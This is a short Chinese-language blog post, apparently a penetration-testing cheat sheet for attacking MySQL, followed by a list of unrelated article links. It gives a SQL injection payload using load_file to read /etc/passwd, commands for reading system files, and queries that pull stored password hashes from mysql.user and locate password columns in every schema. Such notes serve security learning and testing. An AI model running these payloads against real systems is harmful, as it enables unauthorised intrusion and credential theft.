mysql 漏洞利用与提权
判断MySQL服务运行的权限
1、查看系统账号,如果出现MySQL这类用户,意味着系统可能出现了降权。
2、看mysqld运行的priority值。
3、查看端口是否可外联。
MySQL密码获取与破解
1、获取网站数据库账号和密码
2、获取MySQL数据库user表
用户一共有三个文件,即user.frm、user.MYD、user.MYI,MySQL数据库用户密码都保存在user.MYD文件中,包括root用户和其他用户密码。
MySQL密码查询
select user,password from mysql.user;
select user,password from mysql.user where user = 'root';
mysql 渗透技巧
如果发现一个PHP的SQL 注入点,可以通过构造"-1 union select 1,1,1,1,1,load_file('/etc/passwd')"
直接读取的配置文件的命令如下
select load_file('/etc/passwd')\
select load_file('/etc/issues')
select load_file('/etc/etc/rc.local')
一些常见的MySQL命令
show databases;
use testdatabases; 使用某个数据库
show tables;
select * from a 查询a表中所有的数据
select @@datadir; 查询数据库的路径
select @@basedir 查询mysql的安装路径
常用内置函数
select system_user() 查询系统
select current_user() 查询用户
select user() 查询用户
select version() 查询数据库版本
select database() 查询当前连接的数据库
select @@version_compile_os查询当前操作系统
select now() 显示当前时间
快速定位数据库中涉及的密码表
select table_schema,table_name,column_name from information_schema.columns where column_name like ‘%password%’;
最新文章
- ubuntu14.04redis安装以及扩展
- processModel与ASP.NET进程模型
- 两个shell脚本
- mysql 表关联查询报错 ERROR 1267 (HY000)
- LInux 安全测试
- Redis-分布式
- 【你吐吧c#每日学习】10.29 C#字符串类型&Common operators
- Shell如何传递字符串
- Android Drawable 与 LayerList综合汇总
- uitableView 选择跳过后, 跳回 颜色变化 问题
- avalonJS入门(一)
- mysql5.6 无法使用64odbc连接
- 寄存器(CPU原理)
- nexus 10 救砖 安装lineage OS 15 并 root
- element 给table的个别表格框添加样式 ---重构里面的组件
- Pycharm远程调试原理及配置
- Redux,基础
- java 11 ZGC(可伸缩,低延迟的gc)
- __libc_csu_init函数的通用gadget
- 2013长春网赛 1006 hdu 4764 Stone(巴什博弈)